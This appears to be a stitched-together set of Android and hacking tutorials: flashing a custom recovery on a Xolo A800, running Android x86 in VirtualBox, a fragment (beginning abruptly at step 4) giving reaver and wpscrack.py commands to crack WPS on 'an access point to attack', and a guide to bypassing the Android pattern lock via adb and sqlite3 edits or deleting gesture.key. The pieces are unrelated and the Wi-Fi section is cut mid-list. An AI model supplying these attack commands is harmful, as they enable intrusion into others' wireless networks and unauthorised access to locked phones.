CWM Recovery For Xolo A800

Flash custom recovery for Xolo A800 (CWM) 

Things you need:
1) XOLO A800 with either ICS or JB 4.1.1.
2) SP Flash tool from here: SP FLASH TOOL

3) VCOM drivers: ->Drivers for XP/WIN7 - > Download MT6577 USB VCOM Driver (W8) -

4) MTK 6577 scattering file from here: MTK 6577 scattering file

5) CWM Recovery from here:
CWM

Download all the above files.
Now you need to install VCOM drivers so that your phone can be detected by the flash tool.

Installing VCOM Drivers:
1) First switch on USB debugging mode from the developers options.
2) Switch of your phone completely and do not connect the phone to the pc yet.
3) Open Device manager of your computer and leave it open.
4) Now connect the phone with your battery inserted. You will notice the device manager refreshing and a MT65xx preloader as shown below. This means the drivers need to be installed.

5) Now launch the installdriver.exe from the unzipped MT6577 USB VCOM drivers folder. Confirm the installation of unsigned drivers

6) If there are any warnings in windows 7, just accept and install.
7) Reboot your PC
8) Open device manager again and connect your phone in switched off state. You will see device manager refreshing.
9) A mediatek preloader USB VCOM driver appears for some seconds and disappears.

10) Before the driver disappears, you need to click on it. The properties of the driver appears. You need to select update driver which is under the tab driver.

11) Select files option and navigate to the folder where you extracted the mtk6577 VCOM drivers.

12) Choose WIN 7 or windows 2K_XP_COM (depending on the OS you have running on your PC) and complete the installation.

13) That's it. Now you have to REBOOT PC and go on with the next step. 

Flashing CWM Recovery

1) Open flash tool folder and start sp flash tools by right clicking and choosing run as administrator.

2) Click on scatter-loading and select the MTK6577 scatter file which you downloaded from the link.

3) It will show the various options which you can flash.

4) Now you need to click on recovery and select the CWM recovery which you downloaded. it will be named as recovery.img (ONLY RECOVERY SHOULD BE TICKED)

5) Now press download button. It will pop up a warning message. Don't worry and click YES.

6) Connect your phone and let the process get over.

7) It will show a green circle saying finished.

8) That's it. Now you can switch on your phone with CWM installed.

To enter into CWM recovery, switch off your phone until it vibrates. Then hold Vol+ and Power together till you enter CWM recovery. 

9) Have fun. :)

Run Android On Your PC [Complete Tutorial]:

Requirements :

• 1. Oracle VM VirtualBox Download the latest version of VirtualBox
• 2. Download  Android x86  Image file.
• You can also run other android versions like jelly bean, ICS, Honeycomb etc. which can be downloaded from here.

Steps :

1. Install VirtualBox on your PC. 2. Open VirtualBox and select New. In the dialog box enter the name as your wish and select i) Type : Linux. ii) Version : Other Linux.
and select Next. 3. In the next dialog box enter the memory size as your wish. Note : Minimum 1 GB required for JellyBean
and click on next. 4. In the next dialog box select create a virtual hard drive now. Then select VDI or VHD and select fixed or dynamically allocated as your wish and create the virtual drive.
Note : Mininimum 1 GB required for installation.
5. Select Virtual device and select settings, a dialog box appears. In the dialog box select. i) Storage -> Storage Tree -> Empty. ii) In the attributes section select the Android 4.3 iso file you downloaded and check Live Cd/Dvd, then click Ok. 6. Then start the virtual device. In the screen select Install Android-x86 to hard disk. 7. In the next screen select Create/Modify Partition. 8. Then create a new primary bootable partition and select write. After finishing writing select quit. 9. Then install android in sda1 and select type as ext3 , choose yes for installing. 10. After installing remove live iso from VirtualBox and reboot. Now you can boot into Android 4.3 . You are done.

4. Scan for an access point to attack, and copy its MAC address for
later (XX:XX:XX:XX:XX:XX).
sudo iwlist scan wlan0
5. Set your device into monitor mode.

6. Run the tool against an access point.
reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
7. Wait until it finishes.
This tool makes it too easy.

WPSCRACK.PY
1. Make the program an executable.
chmod +x wpscrack.py
2. Scan for an access point to attack, and copy its MAC address for
later (XX:XX:XX:XX:XX:XX).
sudo iwlist scan wlan0
3. Get your MAC address, save it for later.
ip link show wlan0 | awk '/ether/ {print $2}'
4. Set your device into monitor mode.
sudo airmon-ng start wlan0
5. Attack your AP.
wpscrack.py –iface mon0 –client <your MAC, because
you're attacking yourself, right?> –bssid <AP MAC
address> --ssid <name of your AP> -v
6. Await victory.

How to Bypass Android Pattern Lock

Android introduces a cool new feature to ensure protection of private data to it's users by Pattern Lock technique. It is a unique thinking , other than remembering or setting difficult combination of password characters whether in numeric or alphabetic form. Pattern lock provides a huge set of patterns to choose from. User may set any unique and different pattern according to their wish anytime.

With advantage of locking screen using this unique way , there is also a problem that sometimes many of android users have to face i.e. what if they forget the pattern they had used to lock their device or try to unlock it with wrong pattern number of times that turned device to get locked permanently ?
If you stuck in such problem so dont worry there are three methods to unlock your device.

Method 1. Unlock Lock Pattern Using Your Email

First method includes a simple way of logging in to your Google account and then getting RID of that lock pattern.This is easiest and most recommended way of unlocking your device.

So if you have entered wrong pattern for 5 times and then if it is showing you the Forgot Lock Pattern option, then you can login through your Google account and bypass the lock pattern system on your device.

Method 2. Unlock Lock Pattern Using Command Prompt

If you have forgotten your email too and unable to log in to your google account then the second method could be handy that includes executing few lines of script in command prompt which will allow you to write any pattern and to get into your OS . As this method includes use of command lines , so it is not that user friendly but it is the most effective way for sure. It involves a few steps :

Step 1: Connect your Android Phone to Your Computer.

Step 2 : Open command prompt as administrator.

Step 3 : Now in command prompt window type the following code carefully exactly as it is and then press  enter.

adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit

 Step 4 : Now you will some screen as shown below and then you can reboot your phone and now when your will start again then try unlocking your phone using any random lock pattern and it will work pretty fine.

 

Step 5 : If you face any problem repeat same steps but instead of the above code try using adb shell rm /data/system/gesture.key and then press enter and now try rebooting your device to see if it works.

 Method 3. Unlock Using Hard Reset Option

Hard Reset is an inbuilt feature of android phones and tablets and every device has it. This method will unlock your device but will remove all user's data and settings as well. You should use this method when none of the above methods work for you and you need to unlock your device urgently. This will remove only the data from phone memory and not from the SD card available in phone.

It involves a few steps to unlock device :

Step 1 : Switch off your phone.

Step 2 : Now while turning your phone on , you need to press some specific combination of keys. Generally it is volume up + power button in many of the android devices so try them first and if they dont work for you so here are list of some popular device combination keys or else better way is to google it.

• Nexus 7 - Volume Up + Volume Down + Power
• Samsung Galaxy S3 - Volume Up + Home + Power
• Motorola Droid X - Home + Power 

Step 3 : Now when your phone starts up and you see the logo of your phone , leave the power but but continue holding the volume up button until you see android recovery screen.

 

you will see some screen like shown above. Just navigate to wipe data/factory reset using volume keys and then press Power button to select it.

Step 4 : You will see a screen as shown below :

Step 5 : After you reach to Yes option , select it by using power switch and then it will erase all data on your phone and will unlock it and so ready to be used once again .
